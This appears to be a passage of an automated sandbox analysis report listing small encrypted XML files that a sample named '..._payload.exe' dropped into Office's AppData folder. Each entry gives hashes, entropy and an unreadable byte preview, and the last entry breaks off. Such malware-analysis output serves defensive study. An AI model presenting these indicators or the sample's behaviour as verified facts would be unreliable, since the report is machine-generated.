                                                                                                      SSDEEP:24:DSunFIHGCeDumFF4/9s+keswsXltdviw8v6bD:DSunwGCeDumLk9bY3d6XwD
                                                                                                      MD5:FE0264C6E62888DCEA5747806E03DEB3
                                                                                                      SHA1:1E2030D3175389565046690B89237FBDBD27405D
                                                                                                      SHA-256:7A7968F815BB11C70B26643F2589ADC4D39326E60BC8C02D020C37BEEC8CCC38
                                                                                                      SHA-512:F3A0D5DA22FD601C99D4A1D8A89A60D77F8B840E2C8E0A0AC7572C3327C5E0EA9B374123CD2B7F1B586A28AC373C83EBDA941BB7095A5C688917780C0D99E57C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml3.u..<.w ...=.....>ri..\r....J^....#9.&.< .P.....6.M17"..P......m&.k.X.....8...$I5w...<.!x..Y...<>........5.MI..wa.....,6.I.+..tv.......z.0..M.4i....`.\8}a).w*._.z+=.........K.....t.r~...BE.'..g..(D..P.6.D..\xW....5U....}....]..7......9.Z.....XWt9.B..t.Fc.".....D..:..<......6xe.7....)6<.E.;.r..V...>/..+..:...n.9.(.....c.......X.(Y....9;M.N|....7%].v...~....CbO<.p....#...3..6]_..8Q.p.Z...F..&}n...[..B,.....P..f<.E<y..9-.... T.t...z.z...b.<...... q...8%.o...$..A.Q..N.Q..g.*.UP...^...E.....e..3....w....2..w.e{1..I.0..t....b....iQ..8...!... ..K..~...j..KPuaQq..\.....e@..`.S.S.vA..].A.(....j..-V..c,R..J.u..s..36@....!..........*.W....-!.....i....R...jT..J..q.........u.H..W.Y.2..b...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120641v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):737
                                                                                                      Entropy (8bit):7.689490826988537
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:7R9y2VRx3h53nkyBr6srMPUu7zXot2vpUA9MFJ93U42zmzPmdou1fMgP7JjGrmvk:7fye1h53jBuAOUgX1vpEp3f2qDmdf7jw
                                                                                                      MD5:6BADA0D6A4C19EF0A1A4595E0068412B
                                                                                                      SHA1:22E32361A75492730DB9FF80E4457D68E67C69B1
                                                                                                      SHA-256:91B04310F988776F95A0D848FD4C86A09AC65B545C712FC39B79B0717D955DC0
                                                                                                      SHA-512:33D495AF387A56051970E37EE6414737950E7659A796D20D5A5F734AC6AB0EEF0D0CD0F001749EF2A893EBB29A980F473E5E7FF31DEC3CD3EFD8DB121AC524EE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlC..Tz.G.....B7.q..(.}G../.h*..,.(v.P..)....$*6w.=U'.......O...w^.3}g....-........o.w.}.S...7...V....'.e..s.E......l.....#.]u..8.\Be.}..y.........I.@ed..#....Fa.e..c.<.u...C.T2.E.#...=4....\...A.dD.*.u..........<)..(......l..\..{.W.CM..u..y.w..r..W....%.(*9.|...(9..za-.+..=.rd...3\..j.2........i.7..HX.J.}..d.~....!S.m .......`...e$.U.dF....P.s[..s1!...D.Ca.....e...w^g..........~.$....4..M......$.G....eq(hq.3......2.a[.~6........OttD.S1...L_.N~.p..b....R.j..E.R...X=.....ZP.l.G9..D..&j.v.......LC_T./...m.V..u.Vvr.!.#-...!.c...q.h....?.=.....!@8-.z.....,.Dq.?....."..b..yg.....n}..A.7.i......'.b.D.`.-.Il.....^hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120642v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):801
                                                                                                      Entropy (8bit):7.726424355195919
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:79KJz/gOjlWv2rReAush/nOiLuuwnUlrAJnv6bD:7kgO621ndpV6uwUlrAJnwD
                                                                                                      MD5:42C164BA5C1A99A87FF43393D5FD498C
                                                                                                      SHA1:9FC86AE48A385220ABF0014F2E29C352DE37B412
                                                                                                      SHA-256:AE82356C44BB0ED939F7760DC880EBB7C03C70E7C7EB97E3B6149F8CF8F0EA0D
                                                                                                      SHA-512:704B24E2CCBE486A73378A546B7DE1994500867CFFE2755CC2385B36C3041C85F7E1A4895636504F610E8A964F8AC27FCAF8C1B5E3EC8D5A5649BE1EBF7A0BAD
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml~..zA..).ps<....=U.2.6+6.=.:.a..|....z.|..w} .dx...Hk&......^.),e...kLBh..nI.(.k..U...F....f.H.[)s.E.....bO.*R..)aB.."..+M....4..$......no..l.a..:..aYgC.MB.D ..,.av.j.@1.]..1%.Z.R..)c.%@. V...'e..}A..2.T?...h. @..+ye&.._..j.8...hg.o....m..#.j.n.H.`.%.D1;......gW.Y."Z..<..t...v..`.:.OG.Q.Nc....`?..&L..#6......J.M....d....#..!.jOtI.8..6.9.......h..-..k.4zx.E.Y%..J.J>".....`A.n..D@..t.-..P.<../....L.....-...P..=.9........h....[D.8-....Q.y ..S.w.4..T~.P'.S......$.R~....x.-....H0..64...|P...e....i..icM........k.....S..C.....W...A1.v...`..\.i.D..e+..'E8..(%;g...D./..na....C}>S.A.....d^9k.f...n.4_].......>.%.:....d..{..U......'..t..ag...v.Np...".....jc......Cx....bj....mlfG..l...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120643v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):733
                                                                                                      Entropy (8bit):7.6926707404751085
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:0x7tywp1EI7Cm6yFfF2Qd6BnYc4dMSh9sn/0zoFOWrWw9aSUVKSnu//4+khvihzr:e84aI7CmRF2QdIYZdPq0zoFT19aSCpnE
                                                                                                      MD5:7D9782F6B86D455B3A11154AE38A568B
                                                                                                      SHA1:AC869A36B64765B50680238CC773CDD58DE48C54
                                                                                                      SHA-256:27DF6E4C32FC28563D7759AC54D61F3DECD76AD8A1DA9FA80CB3697275D6E0FF
                                                                                                      SHA-512:8D8E5FADCA6940E39029FA543FDC17DA9DEAF9C3CE6F644F93F1091940E553248D466B81012450472F94F1F7CD218A7BA745F02D9C229AF8275CC2C4ADFB5AA6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlI.......E..Z..e.#.;~....\JO..$...%...p..%@.!...hTZ.(..R.W.......h.*T.}..,Y...:...>....M.Rv.(.R....!L.H>..r.!CvM....W..... B....m ..7.N2..V...ZU.U%V_I.v.._(M.....z<}N....-..@._gu.Cy......r<......9.W....w.......6.....$@c+..-....nxS.....%.f.p..mu.........i......<..-%.u..y.u.....A..G6b<....9>.6u.rV...A&8.]h.o.....2..].N......N3Q.d..`.1!q.N..w._.....5.p;!..2...K..KN.F......J.Np..65n..M..-..%/...By.4nVV.#....IS.|...O)l...R:..N.s.Y.9^....1C..k=\9..G....ZbG..Ef.....Nc.........I..n.7.."A+.o...OM.j:>..n...c:E.f.d....oB.5J...%.O.Q.....).W...|*b\...}X...I.ux5....7Di...b.O1.\......s.'#.k....g.N.r..ns...F..r[....O........0.hC.o.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120644v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):812
                                                                                                      Entropy (8bit):7.734587579631006
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:MYsSZKxq//6fj8U7KzX7YcqMNpScDLv6bD:Kq//Uj8Rb7dqwwD
                                                                                                      MD5:BFDE22F1403E9F74CB3A1FB5802DA60A
                                                                                                      SHA1:D0C4CD2B9A5774AA7CAB19E19BDF97A5CAF8508D
                                                                                                      SHA-256:D14E992812FEBD912C5C605435B69A57BD976BDF761C28669E691477DAE5C551
                                                                                                      SHA-512:EDC584C5062692837036D032A48DB0387E09CB7A53861262BACDC25A4DCADD2863D6DD29F2D07FCD6DBEAA2AB0827B02F472DF87F6630F090F7550DEF50046C4
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlg.h...~.>...B....@...j..w...+.{.Q?}.:..J.........z..RJ.cj[My.....Q.A....N.......=)SN...oS..8T.R.d^..U.Vm..{...+....|.......x.#q....."/..u..B.|.z.A...d.`.o.-.bW...>.!.g.uA.)..=r.g.......I...N.=w.......'".K.Z.d.6.J\:....A...^..A..\C..p...m.O..c..`..uo:^.~0.$..L_...ge...j...+Z.k7..../.l<!q.:s.Q.1}..%..r.s:%3f....#IN...*...."..2Q...V.KJ........Y.....;.fSUX-?.uSV.......!N....x.'^.....p..a...'V...0..h.K....w..|W..a....0.........M..B..\.....(..h;..`.V--.&..0mm...-Xz....c.!<Yx.M....|...AK..5o>.I...zzd|.....?L0.5\p._v.l..*c..]...d.4.:..N..3.W(!...z..%...Mv.B........[..\o......%.8@.P....I.cT5#.tx.1x....^>.d.fv..r..:(e.....~.TU*.2...*F!&dsrG....q.^rv.F.b9./....Pw...>...hL.3...F4n.:.7zqo....j.y.Jk.vhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120645v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):758
                                                                                                      Entropy (8bit):7.712074948611418
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:OksswVf2Y7mNMwX9krXIEyDLadifQtOnxJeS4tnMRm+4Y+NjvTyrq5mRVYU7pIit:O+whsXYX5diYt4/IimlY+ZTfOVz7uiK0
                                                                                                      MD5:B64D47736EA33ACF099F7EA8C4007266
                                                                                                      SHA1:A3EBC51E8C07CD0EDEFECDA972F3B14CBDB5A3FB
                                                                                                      SHA-256:44D21EE48083B47AC8F8CC5B901D7DC38E718078CCBDD5A736ACE951DC0655D3
                                                                                                      SHA-512:C9EA92D7A30A0497DA119648AC60EF966910989E465516811417CEDCDE0AECFEF4C72387E4D4CC38C8B26B8DB649199E45A7350E9938897AA9ABB96A3A886FD3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml/{a...[t...:8C....7JM.4....J.K...l....9......d..!..B.... O.Jk..S.'..D..X...'bm......Z'.......A....x.v~}..'N..:...v_.._...NL$*.D.u':...]..C.^....psL.l..Q.*.V.`..&...-...h...9..Y.5...h.....!F..M..)..MM.....{.<[D.5.k....o..8c....HV.|.3.N?...3.2.......f...1..S.e.K4o..."+..$4...#_."..'z&..i.N.e.|D....=...s..L.....:..../ aH..X..c..-......6.....r....,#s..%.....Q..z.rC...tU. ..[.....k...~...l4..2.8....H..,..b8..>|.>..[*N...{; f4...7...>0.%...*..$.1@..plk._...6.wTS.&.....@...5d.y.....'.p.`.4P.6..?uz...c.b....L.cZH...,.=...U....d...{plp..\G...M.?z.{0...~2."8.&.<...;........5....h..T...aq...j)K.e..vQa.[.5...k...6......\l7.E.m;....5.l/..[.....$.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120646v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):808
                                                                                                      Entropy (8bit):7.740465643328017
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:iDb00IfBRJaKsXm7cGzBAdH3zY2tIKlS1A5zw7DtgQbY9AUo++QYDXMDdy1pqCGh:izkaTW7XAQ+25O9AUo++QoCeq8Xv6bD
                                                                                                      MD5:00A50CECD18C8487B6C340F7F52A4F6C
                                                                                                      SHA1:67130B36C4988C4ACECBD4ED2E0294181D9BCB22
                                                                                                      SHA-256:6E03A0A672CA3C1A0855C6EE170EA67AAF437283686080711DF122951BA273E4
                                                                                                      SHA-512:F9D4027AD59E65066F6AE5D51C252BB89B0D838B39BE55060D68DE51ADE4059F63706621C868E4556488F9228165070F74EC2CBFE968EC477D8B6843F50FF061
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml&.f,.x..8..p1~|&8...1.n.x.j..7......Q.NZ,.d_.E.K...oD\.{.-.q9]..Yim.....z.\.Q....:......:}.......Qb.-C...P..^.IG.?...H..!.&.,3..P4....c>.2...K?M\......"....(^u\.j)7.K..{_U..3u...V.P...*.o..'l....y..>...@M$...#F.....'.......:.....K.M.,R.....(.z3....6O...ut'.T..f3.....Q?._iheJ@].a......"+...t....._={.o..|0lG.....ke~.l,.[.sN.@....1.N".......f..p3.......S..d..yy.P)`!.......V...O.h....6..[5.....F.(.n.j.`......2Z.|\.....$I.?......b.+..^h.>..Q.=....s..<L.........Q%hPc..`f.?.].d....M.Lg..Y.O.B.c.]i..K.r....cE0{n.o.*a.B...}.E~....r.o.g;...+.....S....;....{..V...6....xa..w.?.c.[.*.....[..Ke.X....c@.C.a...Xl..{;$\...=R...[..[yF..j,F..OaM!F..]%..(.60..b.....LAnf.p.`..G..<....<.<M....d..ahZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120647v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):781
                                                                                                      Entropy (8bit):7.718452102995691
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:1TZ2rwzujLxZF9Gvq64g2s5zG3kvrVv6bD:1FQwyHF9GS64g2s5zDhwD
                                                                                                      MD5:5F6BB81CAF03A1C94FAAFA580BFA66C2
                                                                                                      SHA1:637CCD7B3FCF6F13A99DBCF35D5606488136E354
                                                                                                      SHA-256:6749141C5B15474D77C799472E4862489F5D4BCAEDEE0F44C6E0CB19F444C94C
                                                                                                      SHA-512:0BCE1CA0A5B9B8A9B122B558F6A9DFD51538E5829FB7406A310C8F1B519EBCA48F68C863542199F499C4DCA0A9441FDB4CBADF03F24BFA65D46F9BC07242CA77
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.M...........5q/s.82.c.....:4.....o...U..)9.A.=.M..?.?p......ff.m.p..........qo.=.n.7..^..3.....?.....n..Pb..w.......r4.../3....$.@]..%{.?...>..L$-..m...P1xh'...&<.>C.d..3.....F..].-....V.L..H......-....*./..c..PT/j:.'.....b.j...*..M....|.t._K.P.....s.T....3..C.d....<-u%T..mSw....C...LD..k|.z.{........l.i.. r.(...22.&...h.s.....%......t..f..'.8..2....`i.h:.+..6.U..5p.D0C5.z...y$H..-..h.....K....r.)?.....?q......./{.$fv.%ID*}\..m+)z|}..%..]..N|9..+....yR...S.j.O.;..EI.f.z.9...@..35.".Ui....f.d....{E.8KH..4..B.......[XN.l.w.N|..Tb.z...=x..,7.`.}.~.....%r......H.`r....:....Z....uS...W...........!R.gC6.^...ln.#.X.....0..T\.b\...-..L...M.`N..fc.....>..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120648v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):824
                                                                                                      Entropy (8bit):7.730671621677453
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:2y/ExfzKKRNE+TeAwZvwch9lGuSinv6bD:XEx9bEckJba8wD
                                                                                                      MD5:52385058046BB5E20C63F578BF4A0587
                                                                                                      SHA1:3750C22B48D15BA95143056102BBCEDF64B1A73C
                                                                                                      SHA-256:89A943A52AB918334E98C4D6ECCE1ACEB8E39B51251C83C221395D7649AC35AC
                                                                                                      SHA-512:4C9A73B5AE8C1A6B250C0D7F647CB439FEE1E4FABF849BDE117A2B0D9F74C5E419F3981CDA7A246482878EB8EE870C89481D473376CE7091846F020391B8DD98
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmly.V............C...!..W]..ep.........2|"N...`F.gg....a9.L,.3}.....lw....p|.[...?& .....i.y~.....k.._.....G.......R~(}e=..A..........X.Z.FL.3$....7.o@.).L...5H> AU......L|l....a..Bx..#L....8M..a.?...z..+.N..H+V@....lPw........l.\#!..........\O.6.*....9d.@..q...O.....b.....U..........Q0..?..8.(^.|.c....JW.......jP.B....#F.(W.=.$d9.T8._..6...9..<.B..e.:..w.p.....m.-X......:.W....?.@t.J~.J..B...O}......".Q.....g.8Lz.;..p...v..@......H..6......R.....g)..............0...../O........V....$3gEe%7F......L...5.M.;7....|....{.<....Pax.E...{.2$..K=1..}....|2.).m@..W1'.s@}5|]Ok.^.....*..-....J1.eU..s...&o<.=N..>.fY7....6..Jf..j.Hg.i.....}...x..rD.g....}&......v.By...Z.r...#.#...m..-.....o.{.........0.......N$nrhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120649v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):749
                                                                                                      Entropy (8bit):7.704727571317665
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:GE0BmwwyzMgNlL+M1jL8sNldjo6IAQdQqukNFU4J5oRKd/aFv6cii9a:GtBsyzMmL+M13//djo6vQd9u8U4J5AK7
                                                                                                      MD5:A4E5B31AB1EB1B8BD4E462F5E3D0B6EA
                                                                                                      SHA1:66811C14149ACAA14846C29CB40289DC800D77B8
                                                                                                      SHA-256:B24D4CB3D6A7B6F90E71503B5EFF3E7D5C98064976F7EF332DE53FBBABDB4B92
                                                                                                      SHA-512:6E22C2FCD561CE4CFF02C439E3F06951DAB9202674F896683D3D8548246C7DADA76C98258CDC657FC081F2492AE4467F88C7C7752B6C1240F24109AB343A8A1A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml./.."..K..>):....1.i.,.!..L.......@.....+.......]E..%.`J.,1.....(;..:U<...O`w.W...C....#....h..R/........SC.]X..o.......L....P@3.....+.1.....'.P..]'tf.S:..mK].....q\D.Y....8+..C..."..6..7$x....)-.h>F.C...c.6"h....@"..UR.Y.717......}....SC.}6U>...{."..@.../... .N...p.l.[....XYM..+R..pCD.._...K.......g.!P;Ry1....);n.7.~B.VKf6>.t.Y..Q?s...uem.G.....f...R*m.6......a.$.J.3{.7.NC%+9.\.G...1e.!W........G.s`60.N.&u%..R:.r.W]Q.wD.....L..Y.X..=. ....X..._....xz..t.e.C.:...<.w...t..x.z..S.8S_...U/...n.....!...2Uz..[..Vx.......'..3.C...>N.M.,-.......83i H....]..Y.'.KA 3....Nw.....K....0..k).........}....#v...6?..3./Z..Ia.`).0Q4hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120650v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):812
                                                                                                      Entropy (8bit):7.7218376482757005
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:smsgE6Pp+z4XSoUPF9pGxcTpBkIOU/bv6bD:sdQ+zGPUPF9pBJjwD
                                                                                                      MD5:92927DBEC86BF648C0340F23500D34E6
                                                                                                      SHA1:093DED7A36426D140387A1BC7DF161FA10532879
                                                                                                      SHA-256:C9EBC63E7A48001F627A9F3189F17E2CE10FFA9835CECF3652B77F30F60B1689
                                                                                                      SHA-512:9069421D0B50ADF4B5FFCE336F8CC9C08799BBD38494717EF521246F4C3972B051B76A5211F784D85814C099BA4100D105C4D46DE6814A107F6D6B83FF9D0FA9
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..D....D.].....R1.P..........<.vZ...H.5....].h.Ao!..=......".S.F.M n.U_5.B.f....pe...E...qA......{.2.....;...I...m.w..`.0....c-._.M.....O..uu.~..G7.......>.L.j.....r.N.9#.T$.G....t.X.4..x...9......A[.~b..p.q.i...|...,.dNX..^....v..P..v..l..M.gZ.......O.S_..g...Wc.S....:.qu+.j.,......8.PI....f2..G..;...Yx..OZ......L.y=.JB.R..d/.......Z.o...U...g5.]....Ny....[.r.Dk...W0.}..\.`..%{...|f..1...[..wn....Z.a64H2............yRV....o...VBO.-.:.8`.o%p.:T.gU..2-W.|..].J.T../..Z<....E..5....M`..?.%W.Q.V.w.E....@>..K...].E.y...8..g..Y.......6............m.E.....5.....a.;....;..{.+.e/..{~..........lE.0..O.>...-..3..E.{>..z..>..E.b......:.I...~.6b.l@co.)6._...<..l..x...3..+.............W.C.......).hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120651v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):748
                                                                                                      Entropy (8bit):7.73415126894937
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:t0VpoOpmeY9PaTTsA6F74hqTNBA46u/blarW4Zhu4bwkJkfU3UDVtAGoYSYVzv6X:t0ViOpme7h6F0s/0hhBcdM3UDloYhVzs
                                                                                                      MD5:2E6E4CBCEAB4CFB89EDA0EE0E120C417
                                                                                                      SHA1:3D722D508BBF60CA322C954F6339009B1288D48E
                                                                                                      SHA-256:C0B68C49A3CC8FC76590B819DC7FAB5C01E634EB6F9C660BB0CD4BB119BCBC7B
                                                                                                      SHA-512:1B608C4250EB96BF7961DB557608728CA512D3E44EEB2949468EC52EC432F5BE7BF0DF103959C295B16AABD3A42C4830B3E6DCB83E539A431A85AA452509A04C
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlGGFP.~.....g........f.>V.<.9........@e..A.r.*....|..l....{:.P^I...`A..=..2.{]t.x..Q$..B.X..-.D...k.~..B-*....R.(x....[..[.*........!b.O..`/~K....5"f.....KR.&.x..C.Y..c9.g) ...F.9.L.....;=3.<..Up..x.....h..>a..l..o...%|Xj.0..".....C..9g.6.....eh._b!Z%.X.......]Nsnu..s".z.+.1....=.....5..al...... ..Q5%R.UZ....@.....j........d.w.O..%.l...&|N$......I!.q.I....A(...R.C|.d..p.e.S/2../.....#.........71U..n.S0G..v....3\.V..?.I.8q.X.....9......oe...+.....6..;....B.m..d....;.nq.....)....L...h..Fm...2....R.?U....2....u..t...+1"wM.."-8&EC.i.......]i.2\..S.....~W.&..t9.d.AJnW..0.7c....u..+.`.@p...9.. stEq.%..06..D!........FK..P@..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120652v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):804
                                                                                                      Entropy (8bit):7.738979345794467
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:ErP6Ta5oRqwtRiohXTAiUpSV1U2PwcTG0SoIIpgQ8ifOKzpq88sxc/P2BfIv6ciD:Wh5o9riWSD5W9SoHgjr8Xe/uBQv6bD
                                                                                                      MD5:506BFCFE0EF7C869AE6BDE026EBE1B3C
                                                                                                      SHA1:FB27E61B22999C46A91D57DCCAAB0F16B5203C15
                                                                                                      SHA-256:BFAF29F5BCBBB5C09BA6193D6257CE897940267770A42AE7E22C2CF7C57E8C05
                                                                                                      SHA-512:18DC5AEE0B683D001A11099B9B85D042C17250E345EBEE7FA55BB43BDAD79BB3299024972D517F54F9558E6A2E8DC8E20598AEB7E77FAC885F2986F7DFAA0F67
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..s.3b......[..!...h..z..x9=>.Lk~..k...=JL......"J.'.QWI..~.......a..0.Az.j3S.N..Ox.L.......A.8.t.3...!PQ.K.2f..yI.R."/..>.....J.b...}.-.......#...Lw.l|....$.!.Q.6A...P.S.......KOD..h,..._.....LS......T..J"Q2....DQ$].V+...r...ZK....&Ea.;./&r.5...2+n?.;....I...c.}....N......vE.uq...|.#.7.O4.rXD.:P...^.9.&..n..fk...c.....%T.WB.s]..(.."Uh......~..G..B.. ..).Q/.M.9.J.9....@.C`#;..`....2o...S.SL...F.......H.).....k...M.....<[2..n........7].w..n..O...Y.1......q@.]._.2.....)v.Z..A.@...n............3...<..............*!..U...\8..o.T.(....[C.V.....2.....U....d.....$..z...D........Ce.:....C.........h+'. f;V.H.@..J....Q.5....i][y..u..m.OL.x..i.n....K.Mw...#..t.Td3P...$.FO`..!.+hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120653v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):752
                                                                                                      Entropy (8bit):7.712034399409364
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:FqAXOs36OQlAAPUbeTkSpBNfvM77pE3DkxtAYDD+K2xK8RpKrxPSdzuluTWgbgEs:FqAesbaaUnpPk7EDLYf+K2xNkrxqdz7e
                                                                                                      MD5:2BF44EDAE5E02E83B2C7CA4E7637C2AE
                                                                                                      SHA1:A545A90C6B8B0AF5114A3EE546F57093E8B0B7EC
                                                                                                      SHA-256:AF85FAC5B26222BD32BB1F6BDD2EF34B9C50A64AB1C6AD394358AA5E49E77675
                                                                                                      SHA-512:447313A3A9764C2DFFD6C5E4C419D655376EC52393BD8937E0EC79B710AE69F3C07F3D3B652ABBB9FC2A5A1EFC821C188FDAF9CED0266F2DE09FA47DCC31C343
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.$.l4.'[=s3....x.:1..<...Q.&...d$9....7c.>..]w..x...2..Sx....x.....6....(E..F....C...7.>.g.......t.8.".Da.W...O./CCo./.....n.fU.W.E.W..F.4...R6s...=. ....m[..F....>......w$...C...^.M.2..[MS1....+d....O.eZ^...o....~\..#..(...H.,....6C"..h..#..&[...0./....L..*6.y..`.c.#2..MY.8.?........Og$.D.2j...^.W......\.86.b.>......y.G....`....b;...A....r..(4..?.>...^y..Uz.5{.\R....2.N..D./...spk...EF.....w..n.p.._.W.0..S....;==.o.....v...t?&].V.p.jp..V....EF.M#'13..E.Z. ......2..V=6N.h^.":..~vO.@..K...f...K]..qrg^.-eG..[.*............0...h"V.St...sW.e.X....8%..zk..!%..|.V...$...kGr..c......Dc$.Eh... ..}..B...wd\R...V.s..{..q}.t......3.B.U.v..8?..hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule120654v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
